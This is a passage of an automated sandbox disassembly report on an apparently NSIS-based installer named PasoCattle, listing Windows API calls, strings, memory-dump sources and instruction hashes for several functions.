                                                                                                                                                                          • Instruction Fuzzy Hash: 3E51D225604305AADB11AB71CC49A7F37B89F41728F22803FF803761D2DB7C49A1D6AE
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 00404525
                                                                                                                                                                          • IsDlgButtonChecked.USER32(?,000003F0), ref: 00404533
                                                                                                                                                                          • GetDlgItem.USER32(?,000003FB), ref: 00404553
                                                                                                                                                                          • GetAsyncKeyState.USER32(00000010), ref: 0040455A
                                                                                                                                                                          • GetDlgItem.USER32(?,000003F0), ref: 0040456F
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000008,?,00000008,000000E0), ref: 00404580
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 004045AF
                                                                                                                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 00404669
                                                                                                                                                                          • lstrcmpiW.KERNEL32(0046E220,00451D98,00000000,?,?), ref: 004046A6
                                                                                                                                                                          • lstrcatW.KERNEL32(?,0046E220), ref: 004046B2
                                                                                                                                                                          • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004046C2
                                                                                                                                                                          • CoTaskMemFree.OLE32(00000000), ref: 00404674
                                                                                                                                                                            • Part of subcall function 00405CB0: GetDlgItemTextW.USER32(00000001,00000001,00002004,00403FAD), ref: 00405CC3
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,*?|<>/":,00000000,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060C7
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,?,?,00000000), ref: 004060D6
                                                                                                                                                                            • Part of subcall function 00406064: CharNextW.USER32(?,004E30C8,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060DB
                                                                                                                                                                            • Part of subcall function 00406064: CharPrevW.USER32(?,?,004CF0A0,004E30C8,00000000,00403804,004E30C8,-00000002,00403A37), ref: 004060EF
                                                                                                                                                                            • Part of subcall function 00403EA0: lstrcatW.KERNEL32(00000000,00000000,00476240,004D30A8,install.log,00405AC8,004D30A8,004D30A8,004DF0C0,00451D98,80000001,Control Panel\Desktop\ResourceLocale,00000000,00451D98,00000000,00000006), ref: 00403EBB
                                                                                                                                                                          • GetDiskFreeSpaceW.KERNEL32(0044DD90,?,?,0000040F,?,0044DD90,0044DD90,?,00000000,0044DD90,?,?,000003FB,?), ref: 00404785
                                                                                                                                                                          • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004047A0
                                                                                                                                                                            • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406902
                                                                                                                                                                          • SetDlgItemTextW.USER32(00000000,00000400,0040A264), ref: 00404819
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Item$CharText$Next$FreeWindowlstrcat$AsyncBrowseButtonCheckedDiskFolderPrevShowSpaceStateTaskVersionlstrcmpi
                                                                                                                                                                          • String ID: F$A
                                                                                                                                                                          • API String ID: 3347642858-1281894373
                                                                                                                                                                          • Opcode ID: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                          • Instruction ID: 610cab7253faed09e83e35c18a41c8795a2522a57bd741f73bb79fe4ae4f2c97
                                                                                                                                                                          • Opcode Fuzzy Hash: daaa1e0cefc3b075cc9d96c46cb806b6c5f306674e01b7aa8aee38c956bc084c
                                                                                                                                                                          • Instruction Fuzzy Hash: A3B181B1900209BBDB11AFA1CC85AAF7BB8EF45315F10843BFA05B72D1D77C9A418B59
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000), ref: 00406F22
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,?,0000000C,?,00000000), ref: 00406F5C
                                                                                                                                                                          • ReadFile.KERNEL32(?,?,00000010,?,00000000), ref: 00406FD5
                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000005), ref: 00406FE1
                                                                                                                                                                          • lstrcmpA.KERNEL32(name,?), ref: 00406FF3
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00407212
                                                                                                                                                                            • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                            • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Read$CloseCreateHandlelstrcmplstrcpynlstrlenwvsprintf
                                                                                                                                                                          • String ID: %s: failed opening file "%s"$GetTTFNameString$name
                                                                                                                                                                          • API String ID: 1916479912-1189179171
                                                                                                                                                                          • Opcode ID: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                          • Instruction ID: 0b41acfa2c3272d6dc61f6848418d9961a63ce1f0aee58dce5ac99f5834af97b
                                                                                                                                                                          • Opcode Fuzzy Hash: f010b36bd41cc349b356d7a0090dd4afe09556d9e36f72f9254c82778cae22fc
                                                                                                                                                                          • Instruction Fuzzy Hash: 8491CB70D1412DAADF05EBE5C9908FEBBBAEF58301F00406AF592F7290E2385A05DB75
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406902
                                                                                                                                                                          • GetSystemDirectoryW.KERNEL32(0046E220,00002004), ref: 00406984
                                                                                                                                                                            • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                          • GetWindowsDirectoryW.KERNEL32(0046E220,00002004), ref: 00406997
                                                                                                                                                                          • lstrcatW.KERNEL32(0046E220,\Microsoft\Internet Explorer\Quick Launch), ref: 00406A11
                                                                                                                                                                          • lstrlenW.KERNEL32(0046E220,00445D80,?,00000000,00404FD5,00445D80,00000000,0042A4AD,76E223A0,00000000), ref: 00406A73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Directory$SystemVersionWindowslstrcatlstrcpynlstrlen
                                                                                                                                                                          • String ID: F$ F$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                          • API String ID: 3581403547-1792361021
                                                                                                                                                                          • Opcode ID: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                          • Instruction ID: 94ababd57b57874809535cfc920d07d17cc92350817822ff6505e5e4c02fddf3
                                                                                                                                                                          • Opcode Fuzzy Hash: 30c92c856c733ebf4e786737c731cc744bbcb1db4e86cdf6d89c5ce8018e8b94
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E71D6B1A00112ABDF20AF69CC44A7A3775AB55314F12C13BE907B66E0E73C89A1DB59
                                                                                                                                                                          APIs
                                                                                                                                                                          • CoCreateInstance.OLE32(0040AC30,?,00000001,0040AC10,?), ref: 0040257E
                                                                                                                                                                          Strings
                                                                                                                                                                          • CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d, xrefs: 00402560
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CreateInstance
                                                                                                                                                                          • String ID: CreateShortCut: out: "%s", in: "%s %s", icon: %s,%d, sw=%d, hk=%d
                                                                                                                                                                          • API String ID: 542301482-1377821865
                                                                                                                                                                          • Opcode ID: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                          • Instruction ID: 17e7a05f0d3b91d3be5025a92c0a08315d4604efbe7233a371b14ee5b096337f
                                                                                                                                                                          • Opcode Fuzzy Hash: 9902ece9f4b99e682490ae7949af093cffc61241cd73b0ba5a249ab4bbcbe8c9
                                                                                                                                                                          • Instruction Fuzzy Hash: 9E416E74A00205BFCB04EFA0CC99EAE7B79EF48314B20456AF915EB3D1C679A941CB54
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                          • Instruction ID: f621f802e1b16f1afd83cb625a9a5dfb13386b99c5f5a138cca70abed5397206
                                                                                                                                                                          • Opcode Fuzzy Hash: 944ebb341680e93427b3a15fa59e4bc843c1d174164c9a0c79530ba1c2ca476e
                                                                                                                                                                          • Instruction Fuzzy Hash: CEE17A71D04218DFCF14CF94D980AAEBBB1AF45301F1981ABEC55AF286D738AA41CF95
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                          • Instruction ID: 563abc6a1943806f9f153a5c0538de096a4a033458f435c3a5efc50f2cd88ab2
                                                                                                                                                                          • Opcode Fuzzy Hash: 1b88eb350fd00fb33316d24ceb9d72a370f105b0c57197cf1d2e0f134c7777fe
                                                                                                                                                                          • Instruction Fuzzy Hash: 67C16831A042598FCF18CF68C9805ED7BA2FF89314F25862AED56A7384E335BC45CB85
                                                                                                                                                                          APIs
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,00000FA0), ref: 004063EB
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 004063F8
                                                                                                                                                                          • GetVersionExW.KERNEL32(?), ref: 00406456
                                                                                                                                                                            • Part of subcall function 00406057: CharUpperW.USER32(?,0040642D,?), ref: 0040605D
                                                                                                                                                                          • LoadLibraryA.KERNEL32(PSAPI.DLL), ref: 00406495
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 004064B4
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004064BE
                                                                                                                                                                          • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004064C9
                                                                                                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 00406500
                                                                                                                                                                          • GlobalFree.KERNEL32(?), ref: 00406509
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: AddressProc$FreeGlobalLibrary$AllocCharLoadUpperVersionlstrlen
                                                                                                                                                                          • String ID: CreateToolhelp32Snapshot$EnumProcessModules$EnumProcesses$GetModuleBaseNameW$Kernel32.DLL$Module32FirstW$Module32NextW$PSAPI.DLL$Process32FirstW$Process32NextW$Unknown
                                                                                                                                                                          • API String ID: 20674999-2124804629
                                                                                                                                                                          • Opcode ID: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                          • Instruction ID: cf04814c2eceeca0522e3a2239a4cfb7588c45c97b625e8eb28f179f7b3afb0e
                                                                                                                                                                          • Opcode Fuzzy Hash: e76717bc544e744264c82aeaea2435e5936e7e477e24acbe68bbbba6ce647f5a
                                                                                                                                                                          • Instruction Fuzzy Hash: D3919371900219EBDF119FA4CD88AAEBBB8EF04705F11807AE906F7191DB788E51CF59
                                                                                                                                                                          APIs
                                                                                                                                                                          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404199
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004041AD
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004041CA
                                                                                                                                                                          • GetSysColor.USER32(?), ref: 004041DB
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 004041E9
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 004041F7
                                                                                                                                                                          • lstrlenW.KERNEL32(?), ref: 00404202
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040420F
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 0040421E
                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,?,00000000,00404150,?), ref: 0040400D
                                                                                                                                                                            • Part of subcall function 00403FF6: GlobalAlloc.KERNEL32(00000040,00000001,?,?,?,00000000,00404150,?), ref: 0040401C
                                                                                                                                                                            • Part of subcall function 00403FF6: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000001,00000000,00000000,?,?,00000000,00404150,?), ref: 00404030
                                                                                                                                                                          • GetDlgItem.USER32(?,0000040A), ref: 00404276
                                                                                                                                                                          • SendMessageW.USER32(00000000), ref: 0040427D
                                                                                                                                                                          • GetDlgItem.USER32(?,000003E8), ref: 004042AA
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000044B,00000000,?), ref: 004042ED
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F02), ref: 004042FB
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 004042FE
                                                                                                                                                                          • ShellExecuteW.SHELL32(0000070B,open,0046E220,00000000,00000000,00000001), ref: 00404313
                                                                                                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 0040431F
                                                                                                                                                                          • SetCursor.USER32(00000000), ref: 00404322
                                                                                                                                                                          • SendMessageW.USER32(00000111,00000001,00000000), ref: 00404351
                                                                                                                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00404363
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSend$Cursor$Item$ByteCharLoadMultiWide$AllocButtonCheckColorExecuteGlobalShelllstrlen
                                                                                                                                                                          • String ID: F$N$open
                                                                                                                                                                          • API String ID: 3928313111-1104729357
                                                                                                                                                                          • Opcode ID: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                          • Instruction ID: b74f7aac3d4bcd21dc7a54326fe4aeb8052e912a1eb6d084c2fa05dc76f75ebb
                                                                                                                                                                          • Opcode Fuzzy Hash: 9e9e703d48f6c54e41068c493ebacbd9c251cecf858f8a13bd715780d6f12025
                                                                                                                                                                          • Instruction Fuzzy Hash: 5D71B5F1A00209BFDB109F65DD45EAA7B78FB44305F00853AFA05B62E1C778AD91CB99
                                                                                                                                                                          APIs
                                                                                                                                                                          • lstrcpyW.KERNEL32(00465E20,NUL,?,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AD5
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000,000000F1,00000000,00000001,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA,?,00000000,000000F1,?), ref: 00406AF4
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,00465E20,00000400), ref: 00406AFD
                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,00406BFF,00000000,[Rename]), ref: 00405DF2
                                                                                                                                                                            • Part of subcall function 00405DE2: lstrlenA.KERNEL32(?,?,00000000,00406BFF,00000000,[Rename]), ref: 00405E24
                                                                                                                                                                          • GetShortPathNameW.KERNEL32(000000F1,0046B478,00000400), ref: 00406B1E
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,00465E20,000000FF,00466620,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B47
                                                                                                                                                                          • WideCharToMultiByte.KERNEL32(00000000,00000000,0046B478,000000FF,00466C70,00000400,00000000,00000000,?,00000000,?,00406CBC,000000F1,000000F1,00000001,00406EDA), ref: 00406B5F
                                                                                                                                                                          • wsprintfA.USER32 ref: 00406B79
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,0046B478,C0000000,00000004,0046B478,?,?,00000000,000000F1,?), ref: 00406BB1
                                                                                                                                                                          • GlobalAlloc.KERNEL32(00000040,0000000A), ref: 00406BC0
                                                                                                                                                                          • ReadFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00406BDC
                                                                                                                                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename]), ref: 00406C0C
                                                                                                                                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,00467070,00000000,-0000000A,0040A87C,00000000,[Rename]), ref: 00406C63
                                                                                                                                                                            • Part of subcall function 00405E7C: GetFileAttributesW.KERNELBASE(00000003,004035F3,004EB0D8,80000000,00000003,?,?,?,00000000,00403A73,?), ref: 00405E80
                                                                                                                                                                            • Part of subcall function 00405E7C: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,00403A73,?), ref: 00405EA2
                                                                                                                                                                          • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 00406C77
                                                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 00406C7E
                                                                                                                                                                          • CloseHandle.KERNEL32(?), ref: 00406C88
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000002.00000002.2359667912.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000002.00000002.2359649452.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359688043.0000000000409000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000040C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000420000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000042C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.0000000000434000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359714669.000000000046B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          • Associated: 00000002.00000002.2359850330.0000000000500000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_PasoCattle.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$ByteCharCloseGlobalHandleMultiNamePathShortWidelstrcpylstrlen$AllocAttributesCreateFreePointerReadSizeWritewsprintf
                                                                                                                                                                          • String ID: ^F$%s=%s$NUL$[Rename]$plF
                                                                                                                                                                          • API String ID: 565278875-3368763019
                                                                                                                                                                          • Opcode ID: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
                                                                                                                                                                          • Instruction ID: 187392fb1a539ff374a899d42f74550c270b9899c721d3c7d9f4fe98b52eb23c
                                                                                                                                                                          • Opcode Fuzzy Hash: 8d6a48264c4b44e6e847a38bbc5540ed6369e357cae48dbe616f47649f698452
